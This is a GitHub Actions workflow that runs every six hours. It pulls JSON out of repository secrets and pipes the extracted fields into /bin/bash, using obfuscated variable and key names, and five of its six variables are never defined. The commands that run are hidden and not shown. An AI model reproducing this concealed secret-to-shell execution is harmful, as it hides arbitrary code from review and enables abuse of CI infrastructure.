name: thenexplore

on:
  workflow_dispatch:
  schedule:
    - cron: '5 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: thenexplore
        env:
          dvgp3307: ${{ secrets.dvgp3307 }}
        run: |
          echo $dvgp3307 | jq -r .uzv78 | /bin/bash
          echo $tq0522 | jq -r .ranxb5381 | /bin/bash
          echo $dudd64141 | jq -r .cfmht624 | /bin/bash
          echo $zx6938 | jq -r .ohkyp50541 | /bin/bash
          echo $rycvm11 | jq -r .ec501 | /bin/bash
          echo $ksiil2901 | jq -r .va3700 | /bin/bash

